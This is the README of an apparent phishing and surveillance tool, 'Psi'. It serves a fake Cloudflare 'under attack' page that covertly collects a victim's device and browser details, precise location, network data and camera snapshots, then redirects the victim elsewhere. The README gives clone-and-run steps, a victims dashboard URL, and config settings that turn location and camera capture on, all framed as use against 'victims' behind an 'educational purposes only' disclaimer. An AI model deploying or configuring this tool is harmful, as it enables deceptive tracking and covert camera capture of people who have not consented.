- It shows a fake cloudflare under attack page and grabs the information.
- Gets The Information About browser and Device of User.
- Get the exact location coordinates.
- Even if Victim Uses VPN and doesn't allow the location permission you are able to see which country he resides.
- Network Information and all the audio and camera devices connected to the system.
- Snaps the picture from camera.
- You need to have
Node.js
installed.
- Clone the repo using
git clone https://github.com/Th30neAnd0nly/Psi
cd Psi
npm install
npm start
- The app will be running at
http://localhost:5000
- For seeing the victims data visit
http://localhost:5000/victims
- The
app.js
file containsconfig
variable.
var config={
location:true,
camera:true,
camsnaps:4,
redirectURL:"https://google.com"
}
location:true
//Can be true or false
- Set it to
true
, if you want to grab victims location coordinates.
camera:true
//Can be true or false
- Set it to
true
, If you want to capture images from victims camera.
camsnaps:2
- Set the number of images you want to capture
redirectURL: "https://xxxxxxx.xxx"
- The website where you want the user to be redirected after getting information.
- TechChip (For His Camphish)
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of the PSI is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.